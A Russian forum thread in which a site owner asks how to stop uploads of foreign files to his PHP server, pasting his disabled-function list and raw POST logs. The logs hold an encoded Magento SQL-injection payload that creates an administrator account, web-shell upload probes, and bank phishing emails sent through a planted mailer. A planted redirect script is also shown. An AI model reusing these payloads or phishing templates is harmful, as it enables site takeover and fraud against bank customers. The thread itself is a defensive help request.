Гость
Войти | Профиль | Очистить
Целевая тема:
Создать новую тему:
Автор:
Действия ...
Форумы / PHP, Perl, Python [игнор отключен] [закрыт для гостей] / Как настроить php чтобы не загружали левые файлы? / 7 сообщений из 7, страница 1 из 1
01.01.2017, 14:52
    #39378709
mpro
mpro
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Как настроить php чтобы не загружали левые файлы?
Постоянно на сервере появляются левые файлы, все кроме php закрыто намертво и вообще настроено на доступ с одного айпи.

в PHP.INI отключены все функции которые рекомендованы в статьях по безопасности:.

disable_functions ="exec,assert,curl_exec,shell_exec,passthru,system,eval,show_source,proc_open,popen,parse_ini_file,dl,fp,print,fsockopen,phpinfo,fileperms,curl_setopt"


Далее я настроил чтобы все post действия php логгировались и вижу кучу левых действий, например:
2016-11-13 18:46:50 188.191.239.237
submit=>Upload Image
Name=>cache.php
---------------------------
2016-11-13 23:26:04 188.191.239.237
submit=>Upload Image
Name=>cache.php
---------------------------
2016-11-15 13:36:20 216.244.84.85
___directive=>e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ
filter=>cG9wdWxhcml0eVtmcm9tXT0wJnBvcHVsYXJpdHlbdG9dPTMmcG9wdWxhcml0eVtmaWVsZF9leHByXT0wKTtTRVQgQFNBTFQgPSAncnAnO1NFVCBAUEFTUyA9IENPTkNBVChNRDUoQ09OQ0FUKCBAU0FMVCAsICdnZW50bycpICksIENPTkNBVCgnOicsIEBTQUxUICkpO1NFTEVDVCBARVhUUkEgOj0gTUFYKGV4dHJhKSBGUk9NIGFkbWluX3VzZXIgV0hFUkUgZXh0cmEgSVMgTk9UIE5VTEw7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgZmlyc3RuYW1lYCwgYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCxgcnBfdG9rZW5gLGBycF90b2tlbl9jcmVhdGVkX2F0YCkgVkFMVUVTICgnRmlyc3RuYW1lJywnTGFzdG5hbWUnLCdlbWFpbEBleGFtcGxlLmNvbScsJ21hZycsQFBBU1MsTk9XKCksMCwwLDEsQEVYVFJBLE5VTEwsIE5PVygpKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKHBhcmVudF9pZCx0cmVlX2xldmVsLHNvcnRfb3JkZXIscm9sZV90eXBlLHVzZXJfaWQscm9sZV9uYW1lKSBWQUxVRVMgKDEsMiwwLCdVJywoU0VMRUNUIHVzZXJfaWQgRlJPTSBhZG1pbl91c2VyIFdIRVJFIHVzZXJuYW1lID0gJ21hZycpLCdGaXJzdG5hbWUnKTs=
forwarded=>1
---------------------------
2016-11-15 13:36:21 216.244.84.85
form_key=>D4eM2E7wXQT4AYYO
login=>Array
---------------------------
2016-11-15 18:09:55 188.191.239.112
submit=>Upload Image
Name=>cache.php
---------------------------

Правда этого файла я не нахожу, вроде бы. Хотя может не там ищу.



Есть куча левых файлов с совершенно разным содержанием, например:
<?php
#abaixo, criamos uma variavel que terá como conteúdo o endereço para onde haverá o redirecionamento:
$redirect = " http://108.179.252.52/~santa647/acesso-online/";

#abaixo, chamamos a função header() com o atributo location: apontando para a variavel $redirect, que por
#sua vez aponta para o endereço de onde ocorrerá o redirecionamento
header("location:$redirect");

?>


Вот что означает например начало одного из логов, я там ничего не понимаю:

Код: php
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
20.
21.
22.
23.
24.
25.
26.
27.
28.
29.
30.
31.
32.
33.
34.
35.
36.
37.
38.
39.
40.
41.
42.
43.
44.
45.
46.
47.
48.
49.
50.
51.
52.
53.
54.
55.
56.
57.
58.
59.
60.
61.
62.
63.
64.
65.
66.
67.
68.
69.
70.
71.
72.
73.
74.
75.
76.
77.
78.
79.
80.
81.
82.
83.
84.
85.
86.
87.
88.
89.
90.
91.
92.
93.
94.
95.
96.
97.
98.
99.
100.
101.
102.
103.
104.
105.
106.
107.
108.
109.
110.
111.
112.
113.
114.
115.
116.
117.
118.
119.
120.
121.
122.
123.
124.
125.
126.
127.
128.
129.
130.
131.
132.
133.
134.
135.
136.
137.
138.
139.
140.
141.
142.
143.
144.
145.
146.
147.
148.
149.
150.
151.
152.
153.
154.
155.
156.
157.
158.
159.
160.
161.
162.
163.
164.
165.
166.
167.
168.
169.
170.
171.
172.
173.
174.
175.
176.
177.
178.
179.
180.
181.
182.
183.
184.
185.
186.
187.
188.
189.
190.
191.
192.
193.
194.
195.
196.
197.
198.
199.
200.
201.
202.
203.
204.
205.
206.
207.
208.
209.
210.
211.
212.
2016-10-19 23:10:18 67.20.76.140
jform=>Array
option=>com_users
task=>registration.register
---------------------------
2016-10-19 23:10:19 67.20.76.140
jform=>Array
option=>com_users
task=>registration.register
---------------------------
2016-10-21 00:16:50 95.37.250.65
action=>showbiz_ajax_action
client_action=>update_plugin
---------------------------
2016-10-21 00:16:50 95.37.250.65
action=>revslider_ajax_action
client_action=>update_plugin
---------------------------
2016-10-21 00:16:52 95.37.250.65
action=>showbiz_ajax_action
client_action=>update_plugin
---------------------------
2016-10-21 00:16:53 95.37.250.65
action=>revslider_ajax_action
client_action=>update_plugin
---------------------------
2016-10-22 20:59:19 93.120.159.38
action=>showbiz_ajax_action
client_action=>update_plugin
---------------------------
2016-10-22 20:59:19 93.120.159.38
action=>revslider_ajax_action
client_action=>update_plugin
---------------------------
2016-10-22 20:59:22 93.120.159.38
action=>showbiz_ajax_action
client_action=>update_plugin
---------------------------
2016-10-22 20:59:23 93.120.159.38
action=>revslider_ajax_action
client_action=>update_plugin
---------------------------
2016-10-26 12:36:54 163.172.129.161
win=>6.1
vers=>6.00
oprat=>2
uinfo=>RFVNTVkgQCBQQ1xBZG1pbmlzdHJhdG9y
uid=>7236007321987722128
---------------------------
2016-10-26 15:01:56 163.172.128.98
win=>6.1
vers=>6.00
oprat=>2
uinfo=>RFVNTVkgQCBQQ1xBZG1pbmlzdHJhdG9y
uid=>7236007321987722128
---------------------------
2016-10-27 18:45:28 138.201.171.209
url=>http://partster.ru/brand/beral
timeout=>10
---------------------------
2016-11-04 23:44:26 177.75.188.126
B1=>Kirim
---------------------------
2016-11-04 23:45:29 177.75.188.126
veio=>sim
nome=>Banco Sabadell
de=>no-reply@sabadellatlantico.es
assunto=>Actualizacion de Seguridad
html=>

emails=>zicavirus597@gmail.com
Submit=>Enviar
---------------------------
2016-11-04 23:46:33 177.75.188.126
veio=>sim
nome=>Bradesco
de=>no-reply@sabadellatlantico.es
assunto=>teste
html=>

emails=>eduardo.sousa.silva@outlook.com.br
fabi-nana@ig.com.br

Submit=>Enviar
---------------------------
2016-11-04 23:49:21 177.75.188.126
veio=>sim
nome=>Bradesco
de=>no-reply@sabadellatlantico.es
assunto=>Bradesco, Atualiza&#231;&#227;o de Seguran&#231;a
html=><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>-bom dia</title>
<style type="text/css">
<!--
.style2 {
	font-size: 18px;
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-weight: bold;
	color: #333333;
}
.style3 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; }
.style4 {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 10px;
	color: #333333;
}
.style6 {font-family: Verdana, Arial, Helvetica, sans-serif; color: #333333; }
a:link {
	color: #0000FF;
}
a:visited {
	color: #006699;
}
a:hover {
	color: #990000;
}
a:active {
	color: #006699;
}
.style7 {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 12px;
	color: #333333;
}
.style7 {
	text-align: left;
}
.style7 .style7 {
	text-align: left;
}
-->
</style>
</head>

<body>
<table cellpadding="0" cellspacing="0">
<tr>
<td height="35" colspan="5" bgc
emails=>eduardo.sousa.silva@outloook.com.br
Submit=>Enviar
---------------------------
2016-11-05 01:57:13 177.75.188.126
veio=>sim
nome=>Banco Sabadell
de=>no-reply@sabadellatlantico.es
assunto=>Actualizacion de Seguridad
html=>
wefegfertyry
emails=>zicavirus597@gmail.com
Submit=>Enviar
---------------------------
2016-11-05 01:59:37 177.75.188.126
veio=>sim
nome=>Banco Sabadell
de=>no-reply@sabadellatlantico.es
assunto=>Bradesco, Atualiza&#231;&#227;o de Seguran&#231;a
html=><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>-bom dia</title>
<style type="text/css">
<!--
.style2 {
	font-size: 18px;
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-weight: bold;
	color: #333333;
}
.style3 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; }
.style4 {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 10px;
	color: #333333;
}
.style6 {font-family: Verdana, Arial, Helvetica, sans-serif; color: #333333; }
a:link {
	color: #0000FF;
}
a:visited {
	color: #006699;
}
a:hover {
	color: #990000;
}
a:active {
	color: #006699;
}
.style7 {
	font-family: Verdana, Arial, Helvetica, sans-serif;
	font-size: 12px;
	color: #333333;
}
.style7 {
	text-align: left;
}
.style7 .style7 {
	text-align: left;
}
-->
</style>
</head>
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
01.01.2017, 17:16
    #39378731
vkle
vkle
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Как настроить php чтобы не загружали левые файлы?
mproЕсть куча левых файловГхм.... откуда они взялись? Вы их сами закинули на хостинг? Нет? Это "благодарные" пользователи нафигачили? В таком случае прошу прощения за глупый вопрос, а нахрена Вы, вообще, разрешаете пользователям закидывать на хостинг эту левоту? Да, и чего ради пользователи имеют принципиальную возможность загружать пхпшные (а так же, перловые, шеллл и прочие скриптовые) файлы? Впрочем, причиной появления левоты может быть и поломатая ОСь, что-то вроде прошлогодней (или позапрошлогодней?) уязвимости glibc. Это, к вопросу "ой, у меня в конфигах всё пучком, а оно всё равно лезет". Однако, необходимости администрирования сервера по теме закрытия всевозможных уязвимостей системы никто, вроде, не отменял пока.
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
01.01.2017, 17:18
    #39378732
Hett
Hett
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Как настроить php чтобы не загружали левые файлы?
Дыры в своем пхп приложении залатайте и будет счастье.
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
01.01.2017, 18:19
    #39378743
mpro
mpro
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Как настроить php чтобы не загружали левые файлы?
Каким способом закрыть аплоад?

Какие примерно могут быть уязвимости?
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
01.01.2017, 20:00
    #39378765
skyANA
skyANA
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Как настроить php чтобы не загружали левые файлы?
mproКаким способом закрыть аплоад?

Какие примерно могут быть уязвимости?
Хм, начните с этого: https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
02.01.2017, 14:54
    #39378899
mpro
mpro
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Как настроить php чтобы не загружали левые файлы?
Спасибо интересная информация, но мне бы лучше чтонить вроде топ10 популярных уязвимостей которые используют. И кстати если в php отключу аплоад, то это 100% что загрузить ничего нельзя или есть еще обходные пути?
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
02.01.2017, 15:53
    #39378915
vkle
vkle
Участник
Скрыть профиль Поместить в игнор-лист Сообщения автора в теме
Как настроить php чтобы не загружали левые файлы?
mproИ кстати если в php отключу аплоад, то это 100% что загрузить ничего нельзя или есть еще обходные пути?Есть, и не так уж мало - функции типа file_get_contents вполне позволяют притянуть внешний контент, а так же сокеты, curl и т.д. вплоть до GET и POST запросов (код простенького загрузчика вполне можно передать в GET). Проблема чаще всего обнаруживается не в PHP и его настройках, а в коде скриптов, которые позволяют сделать пользователю больше, чем предполагал разработчик.
...
Рейтинг: 0 / 0
| Ответить | Цитировать | Написать  
Форумы / PHP, Perl, Python [игнор отключен] [закрыт для гостей] / Как настроить php чтобы не загружали левые файлы? / 7 сообщений из 7, страница 1 из 1
Найденые пользователи ...
Разблокировать пользователей ...
Читали тему (0):
Читали форум (0):
Пользователи онлайн (0):
x
x
Закрыть


Просмотр
0 / 0
Close
Debug Console [Select Text]